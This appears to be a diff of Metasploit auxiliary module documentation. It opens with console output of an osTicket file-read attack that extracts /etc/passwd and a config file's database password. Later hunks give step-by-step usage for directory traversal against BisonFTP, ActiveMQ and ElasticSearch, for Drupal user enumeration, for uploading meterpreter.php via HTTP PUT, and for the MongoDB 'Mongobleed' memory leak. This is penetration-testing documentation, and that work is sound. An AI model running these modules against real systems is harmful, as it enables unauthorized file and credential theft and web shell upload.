[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[*] Data looks like base64? false
[*] Treating as plain (non-base64) - preview:
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
[*] extract_files_from_pdf: Total extracted files: 1
[+] Extracted 1235 bytes
======================================================================
EXTRACTED FILE CONTENTS
======================================================================
--- [/etc/passwd] (1235 bytes) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
mysql:
[+] Saved to: /home/tintin/.msf4/loot/20260222194159_default_1_osticket.etc_pas_624998.bin
[+] Exploitation complete
[*] Auxiliary module execution completed
```
### Without Specifying Ticket Number
```
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME newuser
USERNAME => newuser
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
VERBOSE => true
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
RHOSTS => http://localhost:8080/
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD newuser
PASSWORD => newuser
msf auxiliary(gather/osticket_arbitrary_file_read) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] is_osticket?: Response code=200, body length=4943
[*] is_osticket?: osTicket signature FOUND in response body
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
[*] Target: 127.0.0.1:8080
[*] File to extract: include/ost-config.php
[*] Attempting authentication...
[*] do_login: portal preference=auto, base_uri=/, username=newuser
[*] do_login: Trying staff panel (/scp/) login...
[*] osticket_login_scp: GET /scp/login.php
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=uf493kdg73eh3bf11pmcv6ed54;
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=0e9e898a719233e0a4ecec120cd047d0cd9507ee
[*] osticket_login_scp: POST /scp/login.php with userid=newuser
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
[-] osticket_login_scp: Login FAILED (still see login form)
[*] do_login: Staff panel login failed
[*] do_login: Trying client portal login...
[*] osticket_login_client: GET /login.php
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=dba0292e34ca0ff8fc036933d4d6db2a2eb791df
[*] osticket_login_client: POST /login.php with luser=newuser
[*] osticket_login_client: POST response code=302, body contains luser=false
[+] osticket_login_client: Login SUCCESS
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
[+] Authenticated via client portal
[!] No TICKET_NUMBER supplied — a new ticket will be created each time this module runs
[*] create_ticket: GET /open.php
[*] extract_csrf_token: Searching HTML (6579 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
[*] detect_open_form_fields: topicId=2
[*] fetch_topic_form_fields: GET /ajax.php/form/help-topic/2
[*] fetch_topic_form_fields: subject="eac457d4f21b58", message="56f3da3b9db7ae"
[*] create_ticket: POST /open.php (topicId=2)
[*] create_ticket: POST response code=302
[+] create_ticket: Ticket created, internal ID=12
[*] fetch_ticket_number: GET /tickets.php?id=12
[+] fetch_ticket_number: Ticket number=#169169
[+] Created ticket #169169 (internal ID: 12)
[*] Generating PHP filter chain payload...
[*] Payload generated (13656 bytes)
[*] Submitting payload as ticket reply...
[*] submit_ticket_reply: GET /tickets.php?id=12 to fetch CSRF token
[*] submit_ticket_reply: GET response code=200, body=9618 bytes
[*] extract_csrf_token: Searching HTML (9618 bytes) for __CSRFToken__
[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
[*] submit_ticket_reply: Using textarea field '56f3da3b9db7ae', payload=13656 bytes
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=12
[*] submit_ticket_reply: POST response code=200, body=24137 bytes
[*] submit_ticket_reply: Success indicators found=true
[+] Reply posted successfully
[*] Downloading ticket PDF...
[*] download_ticket_pdf: Trying PDF export from /tickets.php
[*] download_ticket_pdf: GET /tickets.php?a=print&id=12
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=57262
[+] download_ticket_pdf: Got PDF (57262 bytes)
[+] PDF downloaded (57262 bytes)
[*] Extracting file from PDF...
[*] extract_files_from_pdf: Processing PDF (57262 bytes)
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
[*] extract_pdf_image_streams: Found image object (6357 bytes decompressed)
[*] extract_files_from_pdf: Found 2 image XObject streams
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
[*] extract_files_from_pdf: Image #1: 6357 bytes, swapped to BGR
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 6357-byte stream
[*] extract_data_from_bmp_stream: 6353 bytes after marker (nulls stripped)
[*] First 96 bytes of data after marker and null-strip:
[*] ascii: "<?php./*********************************************************************. ost-config.php."
[*] hex: 3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
[*] Data looks like base64? false
[*] Treating as plain (non-base64) - preview:
[*] ascii: "<?php./*********************************************************************. ost-config.php."
[*] hex: 3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
[+] extract_files_from_pdf: Image #1 yielded 6353 bytes of extracted data
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
[*] extract_files_from_pdf: Total extracted files: 1
[+] Extracted 6353 bytes
======================================================================
EXTRACTED FILE CONTENTS
======================================================================
--- [include/ost-config.php] (6353 bytes) ---
<?php
/*********************************************************************
ost-config.php
Static osTicket configuration file. Mainly useful for mysql login info.
Created during installation process and shouldn't change even on upgrades.
Peter Rotich <peter@osticket.com>
Copyright (c) 2006-2010 osTicket
http://www.osticket.com
Released under the GNU General Public License WITHOUT ANY WARRANTY.
See LICENSE.TXT for details.
vim: expandtab sw=4 ts=4 sts=4:
$Id: $
**********************************************************************/
#Disable direct access.
if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
die('kwaheri rafiki!');
#Install flag
define('OSTINSTALLED',TRUE);
if(OSTINSTALLED!=TRUE){
if(!file_exists(ROOT_DIR.'setup/install.php')) die('Error: Contact system admin.'); //Something is really wrong!
//Invoke the installer.
header('Location: '.ROOT_PATH.'setup/install.php');
exit;
}
# Encrypt/Decrypt secret key - randomly generated during installation.
define('SECRET_SALT','ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P');
#Default admin email. Used only on db connection issues and related alerts.
define('ADMIN_EMAIL','administrator@localhost.local');
# Database Options
# ====================================================
# Mysql Login info
#
define('DBTYPE','mysql');
# DBHOST can have comma separated hosts (e.g db1:6033,db2:6033)
define('DBHOST','localhost');
define('DBNAME','osticket_db');
define('DBUSER','osticket_user');
define('DBPASS','P@ssw0rd123!');
# Database TCP/IP Connect Timeout (default: 3 seconds)
# Timeout is important when DBHOST has multiple proxies to try
# define('DBCONNECT_TIMEOUT', 3);
# Table prefix
define('TABLE_PREFIX','ost_');
#
# SSL Options
# ---------------------------------------------------
# SSL options for MySQL can be enabled by adding a certificate allowed by
# the database server here. To use SSL, you must have a client certificate
# signed by a CA (certificate authority). You can easily create this
# yourself with the EasyRSA suite. Give the public CA certificate, and both
# the public and private parts of your client certificate below.
#
# Once configured, you can ask MySQL to require the certificate for
# connections:
#
# > create user osticket;
# > grant all on osticket.* to osticket require subject '<subject>';
#
# More information (to-be) available in doc/security/hardening.md
# define('DBSSLCA','/path/to/ca.crt');
# define('DBSSLCERT','/path/to/client.crt');
# define('DBSSLKEY','/path/to/client.key');
#
# Mail Options
# ===================================================
# Option: MAIL_EOL (default: \n)
#
# Some mail setups do not handle emails with \r\n (CRLF) line endings for
# headers and base64 and quoted-response encoded bodies. This is an error
# and a violation of the internet mail RFCs. However, because this is also
# outside the control of both osTicket development and many server
#
... (truncated)
[+] Saved to: /home/tintin/.msf4/loot/20260321104202_default_127.0.0.1_osticket.include_866909.php
======================================================================
KEY FINDINGS
======================================================================
[+] SECRET_SALT: ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P
[+] ADMIN_EMAIL: administrator@localhost.local
[+] DBHOST: localhost
[+] DBNAME: osticket_db
[+] DBUSER: osticket_user
[+] DBPASS: P@ssw0rd123!
[!] No active DB -- Credential data will not be saved!
[+] Exploitation complete
[*] Auxiliary module execution completed
```
@@ -0,0 +1,83 @@
## Vulnerable Application
This module exploits a directory traversal vulnerability in BisonWare BisonFTP Server
version 3.5. The flaw allows an attacker to download arbitrary files from the server by
sending a crafted `RETR` command using traversal strings such as `..//`.
The vulnerability is tracked as [CVE-2015-7602](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602).
### Setup
1. Download BisonWare BisonFTP Server 3.5 from [Exploit-DB (EDB-38341)](https://www.exploit-db.com/exploits/38341).
2. Install and run it on a Windows host.
3. Configure the FTP root directory and ensure the service is listening (default port 21).
4. Set up an anonymous login or create a user account with credentials.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/ftp/bison_ftp_traversal`
3. Do: `set RHOSTS [target IP]`
4. Do: `run`
5. You should see the requested file contents stored as loot.
## Options
### DEPTH
The number of traversal sequences (`..//`) to prepend to the file path. The default is `32`.
A high value is used because the exact depth of the FTP root can vary.
### PATH
The path to the file to retrieve from the target, relative to the drive root. The default value
is `boot.ini`. For example, to read the Windows hosts file, set this to
`windows/system32/drivers/etc/hosts`.
### FTPUSER
The FTP username to authenticate with. Default is `anonymous`.
### FTPPASS
The FTP password to authenticate with. Default is `mozilla@example.com`.
## Scenarios
### BisonFTP 3.5 on Windows XP
```
msf > use auxiliary/scanner/ftp/bison_ftp_traversal
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH boot.ini
PATH => boot.ini
msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
[+] Stored boot.ini to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Reading the hosts file
```
msf > use auxiliary/scanner/ftp/bison_ftp_traversal
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set PATH windows/system32/drivers/etc/hosts
PATH => windows/system32/drivers/etc/hosts
msf auxiliary(scanner/ftp/bison_ftp_traversal) > set VERBOSE true
VERBOSE => true
msf auxiliary(scanner/ftp/bison_ftp_traversal) > run
[*] Data returned:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
[+] Stored windows/system32/drivers/etc/hosts to /root/.msf4/loot/20250319120000_default_192.168.1.10_bisonware.ftp.da_654321.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -52,7 +52,7 @@ This module allows us to scan through a series of IP Addresses and provide detai
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/anonymous```
1. Do: ```use auxiliary/scanner/ftp/ftp_anonymous```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
@@ -62,17 +62,17 @@ This module allows us to scan through a series of IP Addresses and provide detai
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
msf > use auxiliary/scanner/ftp/ftp_anonymous
msf auxiliary(ftp_anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > set RPORT 21
msf auxiliary(ftp_anonymous) > set RPORT 21
RPORT => 21
msf auxiliary(anonymous) > exploit
msf auxiliary(ftp_anonymous) > exploit
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
msf auxiliary(ftp_anonymous) >
```
## Confirming using NMAP
@@ -0,0 +1,55 @@
## Vulnerable Application
This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on
Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions,
allowing an unauthenticated attacker to read arbitrary files from the target host.
The vulnerability is tracked as [CVE-2010-1587](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1587).
### Setup
To test this module you need a Windows host running one of the affected versions:
1. Download [Apache ActiveMQ 5.3.1](http://archive.apache.org/dist/activemq/apache-activemq/5.3.1/) or 5.3.2.
2. Extract the archive and run `bin\activemq.bat` to start the broker.
3. The web console listens on port **8161** by default.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/apache_activemq_traversal`
3. Do: `set RHOSTS [target IP]`
4. Do: `set RPORT 8161`
5. Do: `run`
6. You should see the contents of the requested file saved as loot.
## Options
### FILEPATH
The path of the file to retrieve from the target system, relative to the drive root. The default
value is `/windows\\win.ini`. Backslashes must be used for path separators on Windows targets.
### DEPTH
The number of traversal sequences (`/\..`) to prepend to the request. The default is `4`. If the
file is not found, try increasing this value.
## Scenarios
### ActiveMQ 5.3.1 on Windows Server 2003 SP2
```
msf > use auxiliary/scanner/http/apache_activemq_traversal
msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
RPORT => 8161
msf auxiliary(scanner/http/apache_activemq_traversal) > run
[*] 192.168.1.100:8161 - Sending request...
[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,57 @@
## Vulnerable Application
This module attempts to identify Adobe ColdFusion installations and determine the version
running on the target. It inspects the ColdFusion Administrator login page at
`/CFIDE/administrator/index.cfm` and fingerprints the version based on meta tags, copyright
strings, and other patterns in the HTML response. The module can detect ColdFusion MX6, MX7,
8, 9, and 10, as well as identify the underlying operating system from the `Server` header.
### Setup
Install any version of Adobe ColdFusion up to version 10. The default installation should
have the administrator page accessible at `/CFIDE/administrator/index.cfm`. No additional
configuration is needed.
Alternatively, older ColdFusion trial installers can often be found on the
[Adobe archive](https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html).
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/coldfusion_version`
3. Do: `set RHOSTS [target IP]`
4. Do: `run`
5. You should see the detected ColdFusion version and OS printed to the console.
## Options
## Scenarios
### ColdFusion 9 on Windows Server 2008
```
msf > use auxiliary/scanner/http/coldfusion_version
msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.20
RHOSTS => 10.0.0.20
msf auxiliary(scanner/http/coldfusion_version) > set THREADS 5
THREADS => 5
msf auxiliary(scanner/http/coldfusion_version) > run
[+] 10.0.0.20: Adobe ColdFusion 9 (administrator access) (Windows (Microsoft-IIS/7.5))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### ColdFusion 8 on Linux
```
msf > use auxiliary/scanner/http/coldfusion_version
msf auxiliary(scanner/http/coldfusion_version) > set RHOSTS 10.0.0.30
RHOSTS => 10.0.0.30
msf auxiliary(scanner/http/coldfusion_version) > run
[+] 10.0.0.30: Adobe ColdFusion 8 (administrator access) (Unix (Apache/2.2.22))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,54 @@
## Vulnerable Application
This module exploits an information disclosure vulnerability in the
[Views](https://www.drupal.org/project/views) module for Drupal 6. When the Views module
version 6.x-2.11 or earlier is installed, the autocomplete callback for user fields is
accessible without proper authorization. The module brute-forces the first 10 usernames by
iterating through the letters `a` to `z`.
Drupal does not consider disclosure of usernames to be a security weakness on its own, but
enumerated usernames can be useful for password-guessing attacks.
### Setup
1. Install Drupal 6 with the Views module version 6.x-2.11 or earlier.
2. Create several user accounts so there is data to enumerate.
3. Ensure the Views module is enabled under **Administer > Site building > Modules**.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/drupal_views_user_enum`
3. Do: `set RHOSTS [target IP]`
4. Do: `run`
5. You should see a list of discovered usernames printed to the console.
## Options
### TARGETURI
The base path to the Drupal installation. The default value is `/`. Change this if Drupal is
installed in a subdirectory, for example `/drupal/`.
## Scenarios
### Drupal 6.x with Views 6.x-2.11
```
msf > use auxiliary/scanner/http/drupal_views_user_enum
msf auxiliary(scanner/http/drupal_views_user_enum) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(scanner/http/drupal_views_user_enum) > set TARGETURI /
TARGETURI => /
msf auxiliary(scanner/http/drupal_views_user_enum) > run
[*] Begin enumerating users at 192.168.1.50
[+] Found User: admin
[+] Found User: john
[+] Found User: testuser
[*] Done. 3 usernames found...
[*] Usernames stored in: /root/.msf4/loot/20250319120000_default_192.168.1.50_drupal_user_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,55 @@
## Vulnerable Application
This module exploits a directory traversal vulnerability in ElasticSearch versions prior to
1.6.1. The flaw exists in the Snapshot API and allows an unauthenticated attacker to read
arbitrary files from the target system with the privileges of the JVM process.
The vulnerability is tracked as [CVE-2015-5531](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531).
### Setup
1. Install a vulnerable version of ElasticSearch (prior to 1.6.1). Older releases are available
from the [ElasticSearch downloads archive](https://www.elastic.co/downloads/past-releases).
2. Configure a `path.repo` in `elasticsearch.yml` so that the Snapshot API is available:
```
path.repo: ["/tmp/backups"]
```
3. Start ElasticSearch. It listens on port **9200** by default.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/elasticsearch_traversal`
3. Do: `set RHOSTS [target IP]`
4. Do: `run`
5. You should see the requested file contents saved as loot.
## Options
### FILEPATH
The path to the file to read on the target. The default value is `/etc/passwd`.
### DEPTH
The number of `../` traversal sequences to include. The default is `7`. Increase this if the
file cannot be reached with the default depth.
## Scenarios
### ElasticSearch 1.5.2 on Ubuntu 14.04
```
msf > use auxiliary/scanner/http/elasticsearch_traversal
msf auxiliary(scanner/http/elasticsearch_traversal) > set RHOSTS 10.10.10.50
RHOSTS => 10.10.10.50
msf auxiliary(scanner/http/elasticsearch_traversal) > set RPORT 9200
RPORT => 9200
msf auxiliary(scanner/http/elasticsearch_traversal) > run
[*] The target appears to be vulnerable.
[+] File saved in: /root/.msf4/loot/20250319120000_default_10.10.10.50_elasticsearch.tr_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -1,44 +1,63 @@
## Description
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
## Vulnerable Application
This module targets web servers that allow HTTP PUT and DELETE methods without proper restrictions.
Improper configuration of HTTP PUT can allow attackers to upload arbitrary files to the server.
If executable files are uploaded, this may lead to:
- Arbitrary file upload
- Remote code execution
- Website defacement
- Unauthorized content modification
DELETE method misuse can allow attackers to remove existing files from the server.
To test this module:
1. Set up a web server (Apache, Nginx, IIS, etc.)
2. Ensure HTTP PUT/DELETE methods are enabled
3. Confirm lack of authentication or access control
## Verification Steps
1. Do: ```use auxiliary/scanner/http/http_put```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set PATH [PATH]```
5. Do: ```set FILENAME [FILENAME]```
6. Do: ```set FILEDATA [PATH]```
7. Do: ```run```
1. Start Metasploit: `msfconsole`
2. Load the module: `use auxiliary/scanner/http/http_put`
3. Set options:
- `set RHOSTS [IP]`
- `set RPORT [PORT]`
- `set PATH [PATH]`
- `set FILENAME [FILENAME]`
- `set FILEDATA [PATH]`
4. Run: `run`
If vulnerable, the module will confirm successful upload or deletion.
## Options
### ACTION
Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
Set `ACTION` to either `PUT` or `DELETE`. Default is `PUT`.
### PUT
Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
Uploads files to the server. If `FILENAME` is not specified, a random `.txt` file is generated.
### DELETE
### DELETE
Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE.
Deletes the file specified in `FILENAME`.
### PATH
The path at which this module will attempt to either PUT the content or DELETE it.
Target path for upload or deletion.
### FILEDATA
The content to put in the uploaded file when `ACTION` is set to `PUT`.
Content to upload when using PUT.
## Scenarios
Here `ACTION` is by default set to `PUT`.
```
Example usage with `ACTION` set to `PUT` (default):
```bash
msf > use auxiliary/scanner/http/http_put
msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
RHOSTS => 1.1.1.23
@@ -48,13 +67,11 @@ msf auxiliary(scanner/http/http_put) > set PATH /uploads
PATH => /uploads
msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
FILENAME => meterpreter.php
msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
FILEDATA => file://root/Desktop/meterpreter.php
msf auxiliary(scanner/http/http_put) > run
msf auxiliary(scanner/http/http_put) > set FILEDATA file:/root/Desktop/meterpreter.php
FILEDATA => file:/root/Desktop/meterpreter.php
msf auxiliary(scanner/http/http_put) > run
[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/http_put) >
```
@@ -0,0 +1,44 @@
## Vulnerable Application
This module checks for accessible WordPress pingback functionality.
Pingback is an XML-RPC feature in WordPress that allows blogs to notify each other of references.
If enabled, it can be abused for:
- DDoS amplification attacks
- Internal network scanning
- Information disclosure
To test this module:
1. Set up a WordPress instance (any version with XML-RPC enabled)
2. Ensure `/xmlrpc.php` is accessible
3. Pingback functionality should not be disabled
## Verification Steps
1. Start Metasploit: `msfconsole`
2. Load the module: `use auxiliary/scanner/http/wordpress_pingback_access`
3. Set the target: `set RHOSTS example.com`
4. Run the module: `run`
If vulnerable, the module will indicate that pingback access is enabled.
## Options
This module has no additional options beyond the standard ones.
## Scenarios
Example usage against a WordPress site with pingback enabled:
```bash
msf > use auxiliary/scanner/http/wordpress_pingback_access
msf auxiliary(scanner/http/wordpress_pingback_access) > set RHOSTS example.com
RHOSTS => example.com
msf auxiliary(scanner/http/wordpress_pingback_access) > run
[*] Checking pingback access on example.com
[+] Pingback is enabled and accessible at /xmlrpc.php
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/wordpress_pingback_access) >
```
@@ -1,8 +1,11 @@
## Vulnerable Application
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to
as "Mongobleed."
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed
uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the
decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
- Database credentials
@@ -11,7 +14,8 @@ The vulnerability allows unauthenticated remote attackers to leak server memory
- Connection strings
- Application data
**Note:** This vulnerability only affects servers with zlib compression enabled. The module will check for zlib compression support before attempting exploitation.
This vulnerability only affects servers with zlib compression enabled. The module checks for zlib compression support before attempting
exploitation.
### Vulnerable Versions
@@ -39,44 +43,14 @@ Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
## Verification Steps
1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
2. Start the MongoDB service
2. Start the MongoDB service with zlib compression enabled
3. Start msfconsole
4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
5. `set RHOSTS <target>`
6. `set ACTION CHECK` then `run` (optional - quick vulnerability check)
7. `set ACTION SCAN` then `run` (full exploitation)
6. `check` to verify the target is vulnerable
7. `run` to perform the full memory leak scan
8. Verify that memory contents are leaked and saved to loot
## Actions
The module supports two actions:
### SCAN (Default)
Full exploitation that scans memory offsets and extracts leaked data.
### CHECK
Quick vulnerability check using the Wiz Research "magic packet" technique for deterministic vulnerability detection. This action:
1. Checks the MongoDB version against known vulnerable versions
2. Verifies that zlib compression is enabled on the server
3. Sends a specially crafted packet that triggers the memory leak
4. Analyzes the response for BSON signatures in leaked memory
This provides a quick, low-impact way to confirm vulnerability without performing a full memory scan.
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
ACTION => CHECK
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
```
## Options
### MIN_OFFSET
@@ -95,13 +69,15 @@ Padding added to the claimed uncompressed buffer size. Default: `500`
Minimum bytes to report as an interesting leak in the output. Default: `10`
### QUICK_SCAN
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may
miss some leaks. Default: `false`
### REPEAT
